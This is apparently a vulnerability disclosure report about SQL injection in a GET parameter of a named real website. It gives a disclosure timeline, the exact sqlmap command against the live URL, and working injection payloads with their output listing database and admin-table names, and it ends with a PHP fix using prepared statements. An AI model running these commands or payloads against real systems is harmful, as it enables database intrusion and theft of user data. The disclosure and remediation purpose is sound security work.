2014-05-07: Details sent to the vendor, awaiting vendor processing
2014-05-12: Vendor actively ignored the vulnerability; details opened to third-party security partners
2014-07-06: Details disclosed to core white hats and relevant domain experts
2014-07-16: Details disclosed to ordinary white hats
2014-07-26: Details disclosed to intern white hats
2014-08-02: Details disclosed to the public
Not writing a description, I'm busy going off to change amounts =。=
Injection point: http://www.diyou.cc/?plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1
The GET parameter value is not effectively filtered, which results in SQL injection. This is your company's official product demo site, right? Reporting the injection point only; no further testing was done. Fix it quickly, quickly, quickly!
python sqlmap.py -u "http://www.diyou.cc/?plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1" --batch -p "value" --dbs

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: value
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1 AND 4357=4357

    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1 UNION ALL SELECT NULL,CONCAT(0x71666b6271,0x59784658734a4b746348,0x7165616971),NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1 AND SLEEP(5)
---
[21:47:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL 5.0.11
[21:47:58] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] www.diyou.cc

Database: www.diyou.cc
+-------------------+---------+
| Table             | Entries |
+-------------------+---------+
| diyou_users       | 739     |
| diyou_users_admin | 40      |
| ...               | ...     |
+-------------------+---------+

Database: www.diyou.cc
[154 tables]

database: www.diyou.cc
table: diyou_users_admin
Pulling the data out is only a matter of time; I won't run it here!
Filter the input effectively.
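As an added illustration (not the diyou.cc source, which is not on the page), here is a hypothetical PHP 5.3-compatible lookup shaped the way the report describes, with the GET parameter `value` dropped straight into the SQL, beside the prepared-statement form that "effective filtering" amounts to. The table `diyou_areas` and its columns `id`, `name`, `parent_id`, and the `$pdo` connection are assumptions.

```php
<?php
// Added example, not code from the diyou.cc site (its source is not on the page).
// Assumptions: a PDO connection $pdo to MySQL and a table
// diyou_areas(id, name, parent_id) behind the ?q=areas lookup.

// Vulnerable shape the report implies: $_GET['value'] lands in the query text
// unfiltered, so value=1 AND 4357=4357, value=1 AND SLEEP(5) or a UNION ALL SELECT
// are all executed as SQL, which is exactly what the sqlmap output above shows.
function lookupAreasVulnerable(PDO $pdo, array $get)
{
    $value = isset($get['value']) ? $get['value'] : '';
    $sql = "SELECT id, name FROM diyou_areas WHERE parent_id = " . $value;
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened form: validate the shape of the input first, then bind it as a typed
// parameter so the value can never alter the structure of the statement.
function lookupAreasSafe(PDO $pdo, array $get)
{
    $value = isset($get['value']) ? $get['value'] : '';
    // parent_id is numeric: reject anything that is not a plain integer.
    // "1 AND 4357=4357", "1 AND SLEEP(5)" and "1 UNION ALL SELECT ..." all fail here.
    if (filter_var($value, FILTER_VALIDATE_INT) === false) {
        return array();
    }
    $stmt = $pdo->prepare("SELECT id, name FROM diyou_areas WHERE parent_id = :value");
    $stmt->bindValue(':value', (int) $value, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Connection setup (placeholder credentials). Turn off emulated prepares so the
// binding is enforced server-side by MySQL rather than by client-side escaping.
$pdo = new PDO(
    'mysql:host=localhost;dbname=www.diyou.cc;charset=utf8',
    'DB_USER_PLACEHOLDER',
    'DB_PASS_PLACEHOLDER',
    array(
        PDO::ATTR_EMULATE_PREPARES => false,
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    )
);

$rows = lookupAreasSafe($pdo, $_GET);
```

The same pattern applies to the other query-string parameters the site reads (`area`, `class`, `name`, `q`, `type`): whitelist the allowed shape, then bind.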
Severity: no impact (vendor ignored)
Ignored at: 2014-08-02 23:18
2014-05-13: Thanks, just saw it.